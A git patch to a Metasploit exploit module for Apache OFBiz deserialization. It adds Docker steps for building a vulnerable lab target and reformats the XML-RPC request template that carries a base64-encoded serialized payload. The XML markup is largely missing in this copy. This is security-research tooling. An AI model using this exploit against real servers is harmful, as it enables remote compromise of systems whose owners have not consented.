From ea1f3d60f11fbb7b6ccac0254bbd1ea6219a7b1e Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Mon, 17 Aug 2020 10:03:44 -0400 Subject: [PATCH] Adjust XML whitespace and add commands to the setup docs --- .../linux/http/apache_ofbiz_deserialiation.md | 7 ++++++ .../linux/http/apache_ofbiz_deserialiation.rb | 23 ++++++++++++------- 2 files changed, 22 insertions(+), 8 deletions(-) diff --git a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md index 1fe2594ce8..56504076ec 100644 --- a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md +++ b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md @@ -10,6 +10,13 @@ versions prior to 17.12.04. You can use . +1. Initialize the database with demo data (`INIT_DB=2`) + * `docker run --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12` +1. Start a postgres instance + * `docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres` +1. Link the database and OFBiz containers + * `docker run -d -p 80:8080 -p 8443:8443 --link some-postgres:postgres opensourceknight/ofbiz:15.12` + ## Verification Steps Follow [Setup](#setup) and [Scenarios](#scenarios). diff --git a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb index 022582991e..d593bb4c2b 100644 --- a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb +++ b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb @@ -137,14 +137,21 @@ class MetasploitModule < Msf::Exploit::Remote 'data' => Nokogiri::XML(<<~XML, &:noblanks).to_xml - #{rand_text_alphanumeric(8..42)} - - #{rand_text_alphanumeric(8..42)} - - #{Rex::Text.encode_base64(data)} - - + #{rand_text_alphanumeric(8..42)} + + + + + + #{rand_text_alphanumeric(8..42)} + + #{Rex::Text.encode_base64(data)} + + + + + + XML )